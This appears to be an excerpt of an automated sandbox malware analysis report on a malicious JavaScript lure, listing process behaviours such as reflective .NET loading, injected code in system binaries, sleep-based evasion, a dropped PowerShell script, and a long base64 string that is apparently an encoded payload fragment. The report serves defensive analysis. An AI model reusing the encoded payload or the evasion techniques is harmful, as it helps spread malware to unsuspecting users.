Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr, c44edb08c29bd3d9f67391663c7fff46c.cs	.Net Code: c04f5269ae129eb13e190297e8bd95169 System.Reflection.Assembly.Load(byte[])
Source: 1.2.powershell.exe.1cfdb03c4a0.0.raw.unpack, c44edb08c29bd3d9f67391663c7fff46c.cs	.Net Code: c04f5269ae129eb13e190297e8bd95169 System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0041F04F push ebx; ret	4_2_0041F058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00403280 push eax; ret	4_2_00403282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0041AB61 pushfd ; ret	4_2_0041AB78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0041ABD6 push ds; ret	4_2_0041ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0040D38A push edx; iretd	4_2_0040D453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00426CC3 pushad ; iretd	4_2_00426CEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004084DA push esi; retf	4_2_004084DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004084FF push ebp; iretd	4_2_00408502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00412559 push ecx; iretd	4_2_0041255A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004125DC pushfd ; iretd	4_2_004125FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00405E25 push ecx; ret	4_2_00405E2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401F0E push ss; retf	4_2_00401F14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00EFB008 push es; iretd	4_2_00EFB009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00EF225F pushad ; ret	4_2_00EF27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00EF1368 push eax; iretd	4_2_00EF1369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00EF27FA pushad ; ret	4_2_00EF27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00EF283D push eax; iretd	4_2_00EF2858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F209AD push ecx; mov dword ptr [esp], ecx	4_2_00F209B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00EF9939 push es; iretd	4_2_00EF9940
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045609AD push ecx; mov dword ptr [esp], ecx	9_2_045609B6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_0260527C push ebp; iretd	9_2_0260527F
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02605257 push esi; retf	9_2_0260525A
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_0260F2D6 push ecx; iretd	9_2_0260F2D7
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_0260F359 pushfd ; iretd	9_2_0260F378
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02623A40 pushad ; iretd	9_2_02623A68
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02617B60 push FFFFFFC3h; ret	9_2_02617BCA
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02602BA2 push ecx; ret	9_2_02602BA8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_026178DE pushfd ; ret	9_2_026178F5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02617953 push ds; ret	9_2_02617955
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_0261BDCC push ebx; ret	9_2_0261BDD5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_04416482 push cs; retf	9_2_04416492

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Stormwater Works Drawings Spec.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Temp\downloaded_script.ps1

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JXCJKXCJHKJHXCJHKXCXCJHK.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\et18ob[1].ps1

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\6511-iOQ--

Windows Analysis Report
Stormwater Works Drawings Spec.js

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2706	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3525	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Window / User API: threadDelayed 9839	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\runonce.exe	API coverage: 3.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 5408	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 6932	Thread sleep time: -266000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 6932	Thread sleep time: -19678000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe TID: 3636	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\runonce.exe	Last function: Thread delayed

Source: wscript.exe, 00000000.00000003.1800139870.00000231391B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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